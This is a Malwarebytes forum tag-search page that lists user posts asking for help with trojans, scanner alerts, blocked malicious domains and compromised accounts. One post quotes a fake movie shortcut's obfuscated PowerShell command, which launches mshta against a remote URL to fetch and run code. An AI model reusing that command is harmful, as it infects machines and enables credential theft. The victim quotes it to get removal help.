Jump to content

Search the Community

Showing results for tags 'trojan'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL






Found 124 results

  1. about 3 weeks ago I had to download a software from a site I don't trust called "get into pc" and after about 10 days I noticed windows defender doesn't exist anymore, windows update not working and the pc takes much longer to boot so I downloaded malware bytes and did a scan. It detected 27 malware elements trojans, something called bitcoin miner and some other things, I quarantined them all and installed a new windows and after about a week or so everything happened again and windows defender is deleted again and the pc rakes longer and when I scanned by malwarebytes it detected the same 27 malware elements although I deleted the software I downloaded from that site.. what should I do ?
  2. A while back I clicked upgrade for CCleaner and got a Trojan and other Viruses, I came here and all that was fixed. There is a Pop up on my computer that comes up on the lower right side of the screen every once in a while to Upgrade CCleaner. I am wondering if that might be what lead to the infection? For one thing the Pop up came up today for a minute saying to save 650 Megabytes (Or something) Open CLeaner with a button to OPEN. Only thing is, before I shut down my computer last night I used CCleaner to clean out the cookies. So, there was not 650 Megabytes of cookies - there were 0 Anyway, the question is - How do I get rid of that CCleaner Upgrade/Open Pop-up that Pops up every now and again as I am suspicious of it. (I do like the current version of CCleaner and will not ever upgrade it because last time I did I had Virus come in with it) Note : I use Malwarebytes and Zonealarm
  3. Hi! Okey so i have vmware and running and virtual machine learning linux... the only thing i had running on it was Firefox with addons settings open and extensions NordVPN and "Cookie AutoDelete". And this popped up on my host machine where i have MBAM -Blocked Website Details- Malicious Website: 1 , C:\Windows\SysWOW64\vmnat.exe, Blocked, -1, -1, 0.0.0 -Website Data- Category: Trojan Domain: downloads.otmwumj6qw5em0zb.me IP Address: Port: 443 Type: Outbound File: C:\Windows\SysWOW64\vmnat.exe I have no clue what could have caused this as it's a new virtual machine also... Any help would be appreciated! Thanks in advance
  4. I went to Doba.com as part of my business. Malwarebytes detected a Trojan. I have attached the Malwarebytes report. Here is what I think is the important part of the report: -Website Data- Category: Trojan Domain: d29tyy1hkqra8k.cloudfront.net IP Address: Port: 443 Type: Outbound File: C:\Program Files\Mozilla Firefox\firefox.exe Is this real or a false positive? Thank you, Tom DobaTrojan.txt
  5. I have a trojan in my laptop. I have MWB Premium and MWB Privacy, but I think the trojan preceded them. I bought a new computer, coming today, when he went from changing my passwords to using my debit card. He can't use card any more at least. Want to transfer pictures to new computer - with flash drive? I know very little - but don't want to transfer Firefox Cloud with the trojan in there. My plan is to save my pictures on a flash drive (is that correct?) and start over on new computer. Set up firefox, immediately install MWB software, set up FB and banking info and whatnot. But how do I get out of the Firefox cloud and possibly a Google cloud unknown to me but maybe there to make sure I don't take this trojan with me? What's the best way to do this? I also use Microsoft Edge because my laptop w/Firefox won't let me stream anything. So what do I do about that? Thank you so much for your help. I used to have two live-in computer techs, but they grew up and left home. I would really appreciate any help. I've changed over to new computers before, but not with a trojan in the old one. Thanks.
  6. Hi everyone. I'm using malwarebytes premium trial version because somehow someone got my information of a game account I didn't give to anybody to try and clean completely my pc of any viruses that might have done it. Malwarebytes didn't find any threats except for an antivirus the pc I didn't thoroughly eliminate named Bytefence. I downloaded a program without any problems but before it I was redirected to those sites that appear tellig you to wait 5 seconds with all the screen full of ads and windows opening and closing themselves in the blink of an eye, but that's the only explanation that spyware or something got into my pc, whatever it is. This problem I had it since last week and that was the latest download, or latest visit to those ad-filled sites. I'm betting that one of those ads finally did something to my pc, I couldn't even click the "skip" button because invisible ads were overlapping it. The same day that I saw the account vulnerable I downloaded MalwareBytes and scanned the pc, etc. the rest is history, but I've got notifications that trojans were being blocked and it showed me their IP and information about the attack. But these attacks are really quite often! I've got them since I downloaded MalwareBytes. First I got notified of (All of them being "the next web site appears to be malicious" and being trojans, the later ones when I hadn't even had my google chrome open): hanner-blobal.com wednesday at 17:38 dashphere.com thursday two times in a row at 20:51 but after those, beggining since Monday, a day after I changed my password and pin number in the game and got notified by email that "I" seemed to have problems trying to log in tomy account (being supposedly "I" the hacker, of course) these notifications came: I had 3 of "Potential threat blocked" from different IP'S at: 5:25, 15:50 and 17:32 in Monday (yesterday). Today Tuesday I had 5 attacks in less than 3 hours at times respectively: 22:45, 23:47, 0:39, 1:04 and 1:41. Every one of them from the same IP. Just now, in fact, I got attacked a 6th time writing this part (2:31). I'm scared that when the trial ends Malwarebytes free version won't protect me again from those trojans, and maybe those are the ones that I'm having trouble with. If I didn't install malware I couldn't have known that I was being attacked in the first place, or even blocked them. I'm shocked. I want to know what to do about it, I really want to be safe. Thanks everyone
  7. I downloaded a movie, the file was about 1.7 gb, but when I clicked it, I immediately saw that it was a shortcut to something else. The file size went from 1.7 gb to about 2 kb. A pop-up window appeared, which I closed instantly. This line of code was in the shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $a1=[string][char[]]@(0x48,0x54,0x54,0x70) -replace ' ','';$da=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';Set-Alias uy $da;$a1+='://shortwww.xyz/hit';uy $a1 I have done some research, where people say it's a Trojan that logs keystrokes and credentials. So far im scanning with malware bytes, which removed some regedits to something called diagnostic task, but I'm not sure if that fixed it. Is this something I can save or do I need to reinstall windows? Best case would be to get some software that can detect and remove it. I did find a restore point to the day before it happened, and as I can see, the Trojan changes the registry, and system restore, restores the registry, so am I safe or?
  8. my dekstop has been infected by tojan.agent, i already use both malwarebytes and adwcleaner. but on adwcleaner, i cant delete the trojan.agent on c:\windows\rss folder. im still using my windows defender, and the virus still apearing everytime i turn on my dekstop. i dont have any idea to do now, can someone help me? thankyou!
  9. Now this happened about 3 months ago I have long before reset my PC to windows 10 by now but for some mysterious reason my ABV.bg email has been repeatedly getting hacked every time! even tho last time I changed my password to be unique combination of 30 symbols and letters including the secret question and answer. Its still getting mysteriously hacked and at this point its obvious the information is being leaked from my PC so the trojan/keylogger/hijacker or whatever has not been removed even tho I did repeated Malwarebytes scans and I even scanned with Bitdefender in boot environment still no such luck! Yesterday I saw about total of 74 SVHOST.exe processes in my task manager and I don't wanna say all of them are viruses but I doubt windows needs that many processes to run! So something is definitely up here! As for the virus I had in February that hijacked my browser immediately after I found my email hacked I checked my Temp folder and what do i find multitude of unknown files scattered on about I put them all in a 7zip archieve in case I need them to be give them to a professional for analyzing etc! The hacker had even hijacked my wifi (I even found some chinese characters within the wifi app pointing at some access point in some chinese province) I am pretty sure so at this point I am not even sure if its DNS hijack or browser hijack...or whatever hijack the trojan just keeps appearing and this time he seems to be not leaving any files on HDD so I am not sure if its using fake windows processes or services I need to get rid of the malicious files before trying another clean system install... The FRST.zip logs I have provided are from Safe mode scan today in Windows 10 I included some older ones too from previous months! FRST.zip temp folder viruses package.7z FRST 09th-05 Logs.zip FRST 27th-04 Logs.zip
  10. After launching game it crashed, after I tried to delete the folder it was open in another application. Using Process Explorer I found that it opened a schtask.exe. I looked in Task Scheduler and found a GoogleUpdateTaskMachineUAC that hasn't run yet, but it was linked to a file in Roaming/d_temp/sevices.exe with the game's logo. The game was scanned by ESET nod32 before I ran it. Malwarebytes free didn't detect anything neither did the Rootkit protection or the windows security.
  11. Everything was working fine until a few days ago i copy and pasted my BTC address but it came out different and sent some phisher like 5 bucks i thought i was being stupid and copied a random address so i didnt worry about it until today i found out its a real problem and i need help fixing it
  12. Hi, I had overheating problems in my windows 10 laptop for about a week. I updated my bios and upon restarting, a window popped-up, with a certain WINRMSRV asking for permission through my firewall. I got suspicious and i run a malware scan with malwarebytes, who found 31 menaces and currently 27 are quarantined. Windows firewall and windows security are not working right now (I didn't realize they had been disabled, I see a blank page when opening windows security) , as well as AdobeReader, which I now uninstalled. I would like to know if I can delete these files from quarantine and how can I restore the applications that are not working right now: what happens if I delete the quarantined menaces, given some of them are under system32 folder? I can upload the findings log if is needed Thank you to whomever helps.
  13. Hello. I fell for something today and got a bit screwed, I've had my PC crash twice and I'm a bit worried because Malwarebytes hasn't found anything and something else fishy is up. When the first crash occurred there was like this womans photo plastered on the "crashed" screen, never seen that photo in my life lmao. If you look at my screenshot, when I open the program, it shows that everything is enabled but my taskbar shows the ! sign and shows that protection is not enabled - very odd. First time this has happened too. I uhh.. uninstalled the frowned upon executables. Any help would be nice, thank you for your time. scan.txt Addition.txt FRST.txt
  14. Computer infected with Trojan Virus and Malware My computer has a problem as it has been infected with Trojan virus and malware and adware the name of the virus is(TROJAN.PHISHING.ARK!eml) this name was there when windows defender did offline scan .as well and the keys are not working the desktop icons are not appearing and I can't use the desktop itself and even the local C drive is also affected in user data now how to repair the computer computer desktop icons are not appearing since many days as well as the keys are not responding itself even after pressing F8 the task manager shutdown itself nothing. Actually actually I had installed two apps that is reimage repair and internet download manager for downloading my online lectures then because of this virus entered and the bottom task bar in desktop is always loading and only the wallpaper is shown with no desktop icons and I even tried several times restarting via CPU button . I can't use the desktop. I have a doubt that my computer has been formatted by this virus. When i knew about the virus i installed malwarebytes (Anti virus programmee) and I used to quarantine the virus files and delete them and Windows defender has said it partially removed the Trojan. No icons on the desktop. THE ARROW IS LOADING ALWAYS THE BLUE CIRCLE IN THE BOTTOM ICON BAR. Please resolve this issue as fast as possible
  15. I was using Webroot Internet Security Essentials for years but I became suspicious after I couldn't seem to use my password on my amazon account and I was sent an email about a new device being registered to my Patreon account. So I installed a bunch of different antivirus programs and Malwarebytes found the trojan and removed it. The thing is I don't know how long my PC has had the trojan and I have done some things on the irs website before the trojan was found that involved using basically all of my personal info. So am I screwed? Is there more malware on my PC that I haven't found? Is my SSN just out there now? Looking for guidance here.
  16. Recently I suffered an attack on my PC. I ran windows defender (the default option in Windows 10) and it identified a Trojan. This attack among other things, deleted a bunch of my files. I decided to try malwarebytes and it quarantined a bunch of files. However, I am constantly receiving notifications every minute about a website that malwarebytes is blocking time and time again. I am uploading a screenshot of this notification. What should I do to fix this? An unrelated question would be, can a trojan read pictures and identify words on a picture? Thanks!
  17. Website blocked because Trojan?? activity I think this is false positive, can you please show and deblock it Many peoples used portal.exe from UVI https://www.uvi.net/en/uvi-portal messages from your malwarebyte: -Protokolldetails- Datum des Schutzereignisses: 03.05.20 Uhrzeit des Schutzereignisses: 08:51 Protokolldatei: 7e6ddcd6-8d0a-11ea-b1e8-0a0027000006.json -Softwaredaten- Version: Komponentenversion: 1.0.875 Version des Aktualisierungspakets: 1.0.23348 Lizenz: Premium -Systemdaten- Betriebssystem: Windows 10 (Build 18362.628) CPU: x64 Dateisystem: NTFS Benutzer: System -Einzelheiten zu blockierten Websites- Bösartige Website: 1 , C:\Program Files (x86)\UVI Portal\UVI Portal.exe, Blockiert, -1, -1, 0.0.0 -Website-Daten- Kategorie: Trojaner Domäne: IP-Adresse: Port: 34463 Typ: Ausgehend Datei: C:\Program Files (x86)\UVI Portal\UVI Portal.exe (end)
  18. malwarebytes scanlog.txt FRST.txt Addition.txt
  19. Back in 2018, I've noticed that new folders were created inside my %APPDATA%\Local folder. Those folders are called "dwobcer", "ninorah", and "svsmopg". Today, I looked online to see if I could get rid of those folders. People recommended Process Explorer and eventually I found that an .exe was inside the ninorah folder called ninorah.exe. Even after that, I found even more processes running that were viruses/trojan/etc? I again looked online and after trying probably EVERYTHING (taskkill,etc) to remove the malware/trojan/etc? I finally found out I could use Safe Mode to remove them. After trying to get into safe mode, it doesn't even show the advanced startup option screen. But after trying to get into safe mode twice, malwarebytes finally detected suspious network activity (every minute). Below are screenshots of those suspious files. So, my question is... How do I get rid of these files and programs (I'm on Windows 8.1 (also cant update windows because it's broke))? I don't really want to buy a computer because I'm not working during the pandemic.
  20. FRST.txtAddition.txt Got a shady email, clicked link. (as seen in screenshot) I believe it messed with my chrome browser, since my account is linked to Google account on pc. Opened Chrome on pc, defender went off. Quarantined. Ran malwarebytes scan, found a few Hacktools. Quarantined and removed. However every time I open Chrome and navigate trojan, windows defender alerts me again. I'm scared to shut down pc, when I use Firefox, no trojan detected. What should I do? Malwarebytes scans + tdsskiller not detecting anything.
  21. This pops up everytime I open a new window in Chrome. I have run the Malwarebytes ADW cleaner it seems like it doesn't solve the problem
  22. I had a Malwarebytes scan not too long ago and it said I had +200 trojan horses, and at the time I didn't know what they were, so I just hit quarantine and went on with life, but after learning how dangerous they are to computers, I want to get them completely removed, I just had a scan a few minutes ago that said it detected a trojan.agent. Ive had this computer for a while out and I don't want it to be completely lost, PLEASE HELP
  23. I was downloading arma3 off steam when i got this alert that outbound connection to was stopped because it was malicious. Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 3/27/20 Protection Event Time: 8:12 PM Log File: e040960e-7088-11ea-bbe9-d89ef39c01cc.json -Software Information- Version: Components Version: 1.0.854 Update Package Version: 1.0.21476 License: Premium -System Information- OS: Windows 10 (Build 17763.1098) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , C:\Program Files (x86)\Steam\steam.exe, Blocked, -1, -1, 0.0.0 -Website Data- Category: Trojan Domain: steam.naeu.qtlglb.com.cdn20.com IP Address: Port: 80 Type: Outbound File: C:\Program Files (x86)\Steam\steam.exe
  24. hello, this is the alert of malwerbytes, what can i do to deleat this problem? alert2.txt
  25. Hi, the title says it all, i have ran several full system scans with rootkit detection installed and have found nothing atall. i have also just 100% wiped my whole PC and the problem still occurs. i cant figure out what program it is because as soon as i start up task manager it goes away almost instantly.
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.